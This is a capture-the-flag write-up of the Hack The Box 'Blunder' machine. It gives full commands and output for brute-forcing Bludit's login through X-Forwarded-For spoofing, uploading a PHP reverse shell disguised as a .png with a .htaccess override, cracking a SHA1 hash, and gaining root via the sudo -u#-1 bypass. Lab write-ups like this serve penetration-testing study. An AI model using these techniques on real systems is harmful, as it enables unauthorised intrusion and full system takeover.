Blunder
Port Scan
u505@naos:~/HTB/Machines/Blunder$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.191 [sudo] password for u505:
Starting masscan 1.0.5 at 2021-01-07 18:37:33 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 80/tcp on 10.10.10.191
u505@naos:~/HTB/Machines/Blunder$ nmap -sC -sV blunder Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-07 13:36 EST Nmap scan report for blunder (10.10.10.191) Host is up (0.037s latency). Not shown: 998 filtered ports PORT STATE SERVICE VERSION 21/tcp closed ftp 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-generator: Blunder |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Blunder | A blunder of interesting facts
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 12.32 seconds
Web enumeration
Robots.txt
Nothing interresting.
u505@naos:~/HTB/Machines/Blunder$ curl http://blunder/robots.txt User-agent: * Allow: /
Dirsearch
u505@naos:~/HTB/Machines/Blunder$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common.txt -e "txt,html,php,js" -f -t 100 -u http://blunder
_|. _ _ _ _ _ _|_ v0.4.1 (_||| _) (/_(_|| (_| )
Extensions: txt, html, php, js | HTTP method: GET | Threads: 100 | Wordlist size: 27664
Error Log: /opt/utils/dirsearch/logs/errors-21-01-04_14-43-05.log
Target: http://blunder/
Output File: /opt/utils/dirsearch/reports/blunder/_21-01-04_14-43-05.txt
[14:43:05] Starting: [14:43:06] 403 - 272B - /.hta.html [14:43:06] 403 - 272B - /.hta.js [14:43:06] 403 - 272B - /.hta.php [14:43:06] 403 - 272B - /.hta/ [14:43:06] 403 - 272B - /.htpasswd.php [14:43:06] 403 - 272B - /.htpasswd.txt [14:43:06] 403 - 272B - /.htaccess.php [14:43:06] 403 - 272B - /.htaccess.html [14:43:06] 403 - 272B - /.htpasswd.html [14:43:07] 403 - 272B - /.htaccess.js [14:43:07] 403 - 272B - /.hta.txt [14:43:07] 403 - 272B - /.htpasswd.js [14:43:09] 200 - 7KB - /0 [14:43:12] 200 - 3KB - /about [14:43:13] 301 - 0B - /admin -> http://10.10.10.191/admin/ [14:43:13] 200 - 2KB - /admin/ [14:44:19] 403 - 272B - /icons/ [14:44:23] 200 - 30B - /install.php [14:44:31] 200 - 1KB - /LICENSE [14:45:16] 200 - 22B - /robots.txt [14:45:22] 403 - 272B - /server-status [14:45:22] 403 - 272B - /server-status/ [14:45:42] 200 - 118B - /todo.txt
Task Completed
todo.txt
u505@naos:~/HTB/Machines/Blunder$ curl http://blunder/todo.txt -Update the CMS -Turn off FTP - DONE -Remove old users - DONE -Inform fergus that the new blog needs images - PENDING
admin page
The CMS is Blundit.
Shell access
u505@naos:~/HTB/Machines/Blunder$ searchsploit bludit ---------------------------------------------------------------------- --------------------------------- Exploit Title | Path ---------------------------------------------------------------------- --------------------------------- Bludit 3.9.2 - Authentication Bruteforce Mitigation Bypass | php/webapps/48746.rb Bludit - Directory Traversal Image File Upload (Metasploit) | php/remote/47699.rb Bludit 3.9.12 - Directory Traversal | php/webapps/48568.py Bludit 3.9.2 - Auth Bruteforce Bypass | php/webapps/48942.py Bludit 3.9.2 - Authentication Bruteforce Bypass (Metasploit) | php/webapps/49037.rb Bludit 3.9.2 - Directory Traversal | multiple/webapps/48701.txt bludit Pages Editor 3.0.0 - Arbitrary File Upload | php/webapps/46060.txt ---------------------------------------------------------------------- --------------------------------- Shellcodes: No Results Papers: No Results
There are 2 exploits, the fist one is an authentication brute force by pass. And the second allows to upload php files to the server. The second exploit needs to be authenticated.
Brute force authentication (CVE-2019-17240)
Blundit has a anti-brute force mechanism that block login attempts after 10 invalid logins. But it trusts Proxy forwarded IP. If the header X-Forwarded-For is randomized, the anti brute force mechanism is abused.
public function getUserIp()
{
if (getenv('HTTP_X_FORWARDED_FOR')) {
$ip = getenv('HTTP_X_FORWARDED_FOR');
} elseif (getenv('HTTP_CLIENT_IP')) {
$ip = getenv('HTTP_CLIENT_IP');
} else {
$ip = getenv('REMOTE_ADDR');
}
return $ip;
}
u505@naos:~/HTB/Machines/Blunder$ searchsploit -m 48942
Exploit: Bludit 3.9.2 - Auth Bruteforce Bypass
URL: https://www.exploit-db.com/exploits/48942
Path: /usr/share/exploitdb/exploits/php/webapps/48942.py
File Type: Python script, ASCII text executable, with CRLF line terminators
Copied to: /home/u505/HTB/Machines/Blunder/48942.py
First I tried with the user fergus and rockyou-50.txt. But I was unsuccessful. Using the works of the web page, was easier.
u505@naos:~/HTB/Machines/Blunder$ cewl http://blunder > words u505@naos:~/HTB/Machines/Blunder$ cat users.txt fergus u505@naos:~/HTB/Machines/Blunder$ python3 48942.py -l http://10.10.10.191/admin/login.php -u users.txt -p words [*] Bludit Auth BF Mitigation Bypass Script by ColdFusionX
[◓] Brute Force: Testing -> fergus:CeWL 5.4.8 (Inclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/) [◥] Brute Force: Testing -> fergus:the ... [◑] Brute Force: Testing -> fergus:best [├] Brute Force: Testing -> fergus:fictional [▝] Brute Force: Testing -> fergus:character [◐] Brute Force: Testing -> fergus:RolandDeschain
[*] SUCCESS !! [+] Use Credential -> fergus:RolandDeschain Fatal Python error: _enter_buffered_busy: could not acquire lock for <_io.BufferedWriter name='<stdout>'> at interpreter shutdown, possibly due to daemon threads Python runtime state: finalizing (tstate=0x25aa750)
Current thread 0x00007f02eb077740 (most recent call first): <no Python frame> Aborted
Reverse shell (CVE-2019-16113)
u505@naos:~/HTB/Machines/Blunder$ searchsploit -m 48701
Exploit: Bludit 3.9.2 - Directory Traversal
URL: https://www.exploit-db.com/exploits/48701
Path: /usr/share/exploitdb/exploits/multiple/webapps/48701.txt
File Type: Python script, ASCII text executable, with CRLF line terminators
Copied to: /home/u505/HTB/Machines/Blunder/48701.txt
The exploit consist to upload a php file with an image extension, and an .htaccess file to abuse the server to interpret image extensions as php files.
u505@naos:~/HTB/Machines/Blunder$ head 48701.txt -n 17 # Title: Bludit 3.9.2 - Directory Traversal # Author: James Green # Date: 2020-07-20 # Vendor Homepage: https://www.bludit.com # Software Link: https://github.com/bludit/bludit # Version: 3.9.2 # Tested on: Linux Ubuntu 19.10 Eoan # CVE: CVE-2019-16113 # # Special Thanks to Ali Faraj (@InfoSecAli) and authors of MSF Module https://www.exploit-db.com/exploits/47699
#### USAGE #### # 1. Create payloads: .png with PHP payload and the .htaccess to treat .pngs like PHP # 2. Change hardcoded values: URL is your target webapp, username and password is admin creds to get to the admin dir # 3. Run the exploit # 4. Start a listener to match your payload: `nc -nlvp 53`, meterpreter multi handler, etc # 5. Visit your target web app and open the evil picture: visit url + /bl-content/tmp/temp/evil.png
u505@naos:~/HTB/Machines/Blunder$ sed -n '19,$ p' 48701.txt > exploit2.py u505@naos:~/HTB/Machines/Blunder$ chmod +x exploit2.py
Prepare our reverse shell.
u505@naos:~/HTB/Machines/Blunder$ grep CHANGE u505.php $ip = '10.10.14.12'; // CHANGE THIS $port = 4444; // CHANGE THIS
Rename it as an image file.
u505@naos:~/HTB/Machines/Blunder$ cp u505.php evil.png
Generate the .htaccess file.
u505@naos:~/HTB/Machines/Blunder$ echo "RewriteEngine off" > .htaccess u505@naos:~/HTB/Machines/Blunder$ echo "AddType application/x-httpd-php .png" >> .htaccess
Change parameters inside script.
u505@naos:~/HTB/Machines/Blunder$ grep ME exploit2.py url = 'http://10.10.10.191' # CHANGE ME username = 'fergus' # CHANGE ME password = 'RolandDeschain' # CHANGE ME payload = 'evil.png' # CREATE ME payload2 = '.htaccess' # CREATE ME
Raise our listener
u505@naos:~/HTB/Machines/Blunder$ rlwrap nc -lnvp 4444 Ncat: Version 7.91 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444
Upload the files
u505@naos:~/HTB/Machines/Blunder$ python3 exploit2.py cookie: cf9irqqhraiprjlee00gtdqi63 csrf_token: 4069559be8dac1facccaa033b4a578f45f31881c Uploading payload: evil.png Uploading payload: .htaccess
Call our "image"
u505@naos:~/HTB/Machines/Blunder$ curl http://10.10.10.191//bl-content/tmp/temp/evil.png
The reverse shell opens.
u505@naos:~/HTB/Machines/Blunder$ rlwrap nc -lnvp 4444 Ncat: Version 7.91 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444 Ncat: Connection from 10.10.10.191. Ncat: Connection from 10.10.10.191:35060. Linux blunder 5.3.0-53-generic #47-Ubuntu SMP Thu May 7 12:18:16 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux 20:36:21 up 59 min, 1 user, load average: 0.00, 0.00, 0.19 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT shaun :0 :0 19:37 ?xdm? 1:29 0.00s /usr/lib/gdm3/gdm-x-session --run-script env GNOME_SHELL_SESSION_MODE=ubuntu /usr/bin/gnome-session --systemd --session=ubuntu uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off whoami www-data python -c 'import pty; pty.spawn("/bin/bash")'
User hugo password
After a long enumeration, there no obvious way to pivot user. At the end I found a user file with an hash in the version 3.10 of blundit.
www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ cat users.php
cat users.php
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
"admin": {
"nickname": "Hugo",
"firstName": "Hugo",
"lastName": "",
"role": "User",
"password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
"email": "",
"registered": "2019-11-27 07:40:55",
"tokenRemember": "",
"tokenAuth": "b380cb62057e9da47afce66b4615107d",
"tokenAuthTTL": "2009-03-15 14:00",
"twitter": "",
"facebook": "",
"instagram": "",
"codepen": "",
"linkedin": "",
"github": "",
"gitlab": ""}
}
In 3 seconds the rockyou file was exhasted.
u505@naos:~/HTB/Machines/Blunder$ echo "faca404fd5c0a31cf1897b823c695c85cffeb98d" > hash u505@naos:~/HTB/Machines/Blunder$ hashcat -m 100 hash /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt hashcat (v6.1.1) starting... ... Session..........: hashcat Status...........: Exhausted Hash.Name........: SHA1 Hash.Target......: faca404fd5c0a31cf1897b823c695c85cffeb98d Time.Started.....: Mon Jan 4 15:58:55 2021 (2 secs) Time.Estimated...: Mon Jan 4 15:58:57 2021 (0 secs) Guess.Base.......: File (/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 7913.6 kH/s (5.62ms) @ Accel:1024 Loops:1 Thr:64 Vec:1 Recovered........: 0/1 (0.00%) Digests Progress.........: 14344384/14344384 (100.00%) Rejected.........: 0/14344384 (0.00%) Restore.Point....: 14344384/14344384 (100.00%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1 Candidates.#1....: $HEX[303334323137383439] -> $HEX[042a0337c2a156616d6f732103] Hardware.Mon.#1..: Temp: 42c Util: 41% Core:1137MHz Mem:2505MHz Bus:16
Started: Mon Jan 4 15:58:54 2021 Stopped: Mon Jan 4 15:58:57 2021
I run a second attempt with rockyou file and best 64 rules.
u505@naos:~/HTB/Machines/Blunder$ hashcat -m 100 hash /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt -r /usr/share/hashcat/rules/best64.rule hashcat (v6.1.1) starting... ... faca404fd5c0a31cf1897b823c695c85cffeb98d:Password120
Session..........: hashcat Status...........: Cracked Hash.Name........: SHA1 Hash.Target......: faca404fd5c0a31cf1897b823c695c85cffeb98d Time.Started.....: Mon Jan 4 16:02:46 2021 (0 secs) Time.Estimated...: Mon Jan 4 16:02:46 2021 (0 secs) Guess.Base.......: File (/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt) Guess.Mod........: Rules (/usr/share/hashcat/rules/best64.rule) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 112.3 MH/s (7.17ms) @ Accel:128 Loops:38 Thr:64 Vec:1 Recovered........: 1/1 (100.00%) Digests Progress.........: 7864320/1104517568 (0.71%) Rejected.........: 0/7864320 (0.00%) Restore.Point....: 81920/14344384 (0.57%) Restore.Sub.#1...: Salt:0 Amplifier:0-38 Iteration:0-38 Candidates.#1....: janiece -> mone123 Hardware.Mon.#1..: Temp: 39c Util: 49% Core:1163MHz Mem:2505MHz Bus:16
Started: Mon Jan 4 16:02:46 2021 Stopped: Mon Jan 4 16:02:47 2021
u505@naos:~/HTB/Machines/Blunder$ hashcat -m 100 hash /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --show
faca404fd5c0a31cf1897b823c695c85cffeb98d:Password120
User flag
www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ su - hugo su - hugo Password120
hugo@blunder:~$ cat user.txt cat user.txt <USER_FLAG>
Root flag
Sudo rights
The user hugo has sudo rights
hugo@blunder:~$ sudo -l sudo -l Password120
Matching Defaults entries for hugo on blunder: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User hugo may run the following commands on blunder: (ALL, !root) /bin/bash
As expected the user cannot sudo as root.
hugo@blunder:~$ sudo /bin/bash
sudo /bin/bash
Sorry, user hugo is not allowed to execute '/bin/bash' as root on blunder.
But he can pivot to user shaun.
hugo@blunder:~$ sudo -u shaun /bin/bash sudo -u shaun /bin/bash shaun@blunder:/home/hugo$ id id uid=1000(shaun) gid=1000(shaun) groups=1000(shaun),4(adm),24(cdrom),30(dip),46(plugdev),119(lpadmin),130(lxd),131(sambashare)
User shaun has more rights, but I didn't find a way to own the machine.
Sudo security by-pass (CVE : 2019-14287)
u505@naos:~/HTB/Machines/Blunder$ searchsploit sudo
----------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------- ---------------------------------
(Tod Miller's) Sudo/SudoEdit 1.6.9p21/1.7.2p4 - Local Priv | multiple/local/11651.sh
Apple Mac OSX - Sudo Password Bypass (Metasploit) | osx/local/27944.rb
Battery Life Toolkit 1.0.9 - 'bltk_sudo' Local Privilege E | linux/local/33576.txt
ptrace - Sudo Token Privilege Escalation (Metasploit) | linux/local/47345.rb
RedStar 3.0 Desktop - Enable sudo Privilege Escalation | linux/local/35746.sh
Sudo 1.3.1 < 1.6.8p (OpenBSD) - Pathname Validation Privil | bsd/local/1087.c
Sudo 1.5/1.6 - Heap Corruption | linux/local/20901.c
Sudo 1.6.3 - Unclean Environment Variable Privilege Escala | linux/local/21227.sh
Sudo 1.6.8 - Information Disclosure | linux/local/24606.c
Sudo 1.6.8p9 - SHELLOPTS/PS4 Environment Variables Privile | linux/local/1310.txt
Sudo 1.6.9p18 - 'Defaults SetEnv' Local Privilege Escalati | multiple/local/7129.sh
Sudo 1.6.x - Environment Variable Handling Security Bypass | linux/local/27056.pl
Sudo 1.6.x - Environment Variable Handling Security Bypass | linux/local/27057.py
Sudo 1.6.x - Password Prompt Heap Overflow | linux/local/21420.c
sudo 1.8.0 < 1.8.3p1 - 'sudo_debug' glibc FORTIFY_SOURCE B | linux/local/25134.c
sudo 1.8.0 < 1.8.3p1 - Format String | linux/dos/18436.txt
Sudo 1.8.14 (RHEL 5/6/7 / Ubuntu) - 'Sudoedit' Unauthorize | linux/local/37710.txt
Sudo 1.8.20 - 'get_process_ttyname()' Local Privilege Esca | linux/local/42183.c
Sudo 1.8.25p - 'pwfeedback' Buffer Overflow | linux/local/48052.sh
Sudo 1.8.25p - 'pwfeedback' Buffer Overflow (PoC) | linux/dos/47995.txt
sudo 1.8.27 - Security Bypass | linux/local/47502.py
Sudo Perl 1.6.x - Environment Variable Handling Security B | linux/local/26498.txt
sudo.bin - NLSPATH Privilege Escalation | linux/local/319.c
SudoEdit 1.6.8 - Local Change Permission | linux/local/470.c
ZPanel zsudo - Local Privilege Escalation (Metasploit) | linux/local/26451.rb
----------------------------------------------------------- ---------------------------------
----------------------------------------------------------- ---------------------------------
Shellcode Title | Path
----------------------------------------------------------- ---------------------------------
Linux/x86 - chmod 777 /etc/sudoers Shellcode (36 bytes) | linux_x86/43463.nasm
Linux/x86 - Edit /etc/sudoers (ALL ALL=(ALL) NOPASSWD: ALL | linux_x86/13331.c
Linux/x86 - Edit /etc/sudoers (ALL ALL=(ALL) NOPASSWD: ALL | linux_x86/44507.c
----------------------------------------------------------- ---------------------------------
Papers: No Results
This exploit explains the exact same example to by pass the root user control.
u505@naos:~/HTB/Machines/Blunder$ searchsploit -m 47502
Exploit: sudo 1.8.27 - Security Bypass
URL: https://www.exploit-db.com/exploits/47502
Path: /usr/share/exploitdb/exploits/linux/local/47502.py
File Type: ASCII text, with CRLF line terminators
Copied to: /home/u505/HTB/Machines/Blunder/47502.py
The version is smaler than 1.8.27
hugo@blunder:~$ sudo --version
sudo --version
Sudo version 1.8.25p1
Sudoers policy plugin version 1.8.25p1
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.25p1
Sudo doesn't check for the existence of the specified user id and executes the with arbitrary user id with the sudo priv -u#-1 returns as 0 which is root's id
So doing the sudo with user -1, it provides access as root user by passing the user control.
hugo@blunder:~$ sudo -u#-1 /bin/bash
root@blunder:/home/hugo# whoami
root
root@blunder:/home/hugo# cat /root/root.txt
cat /root/root.txt
<ROOT_FLAG>
References
Daniel Simao 13:05, 7 January 2021 (EST)
